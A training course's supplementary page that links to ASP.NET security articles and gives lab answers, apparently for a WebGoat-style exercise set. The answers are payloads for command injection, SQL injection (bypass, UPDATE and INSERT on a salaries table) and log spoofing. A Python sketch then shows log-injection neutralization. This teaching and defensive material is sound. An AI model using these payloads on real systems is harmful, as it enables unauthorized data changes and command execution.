# 2020.06.19 Supplementary Materials

validateRequest
https://docs.microsoft.com/zh-tw/aspnet/whitepapers/request-validation

Connection String
http://blog.aihuadesign.com/2014/05/10/asp-net-web-config-read-connectionstring-database-connection-string/

View State
https://ithelp.ithome.com.tw/articles/10156037

ViewState security
https://www.itread01.com/p/1395112.html

Is ViewState secure?
https://dotblogs.com.tw/pbnttttt/2008/09/06/5309

## Lab Solutions

### Injection Flaws -> Command Injection

Using Burp proxy, append the following after the file name:

```
"%20%26%20ipconfig
```

### Injection Flaws -> LAB: SQL Injection -> Stage 1

Using Burp proxy, append the following after the file name:

```
'OR '1'='1
```

### Injection Flaws -> Modify Data with SQL Injection

```
jsmith';update salaries set SALARY='10000' where USERID='jsmith';--
```

### Injection Flaws -> Add Data with SQL Injection

```
jsmith';INSERT INTO salaries (USERID,SALARY) VALUES ('test', 500);--
```

### Injection Flaws -> Log Spoofing

```
test%0aLogin Succeeded for username:admin
```
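
Why the Log Spoofing answer works, and how neutralizing line breaks before logging stops it: the sketch below runs the payload through a naive logger and a hardened one. This is an added example, not part of the original notes; the failed-login message format and all function names are assumptions.

```python
from urllib.parse import unquote

# The Log Spoofing answer from this page, as it arrives URL-encoded in the request.
PAYLOAD = "test%0aLogin Succeeded for username:admin"

# Non-ASCII characters that line-oriented tools may also treat as a line break.
_EXTRA_BREAKS = {"\x85", "\u2028", "\u2029"}

def naive_entry(username: str) -> str:
    """Vulnerable pattern: user input is concatenated into the log line as-is."""
    return f"Login failed for username:{username}"  # assumed message format

def neutralize(value: str) -> str:
    """Escape backslashes, quotes, line breaks and control characters so the
    value cannot start a new log record and the escaping stays unambiguous."""
    out = []
    for ch in value:
        if ch in '\\"':
            out.append("\\" + ch)
        elif ch in _EXTRA_BREAKS or ord(ch) < 0x20 or ord(ch) == 0x7F:
            out.append(ch.encode("unicode_escape").decode("ascii"))
        else:
            out.append(ch)
    return "".join(out)

def hardened_entry(username: str) -> str:
    """Hardened pattern: neutralize and quote the value before logging."""
    return f'Login failed for username:"{neutralize(username)}"'

def records(log_text: str) -> list[str]:
    """Split a log the way a line-oriented viewer or parser would."""
    return log_text.splitlines()

if __name__ == "__main__":
    user = unquote(PAYLOAD)  # the web framework decodes %0a to a newline
    print(records(naive_entry(user)))     # two records, the second one forged
    print(records(hardened_entry(user)))  # one record, newline shown as \n
```
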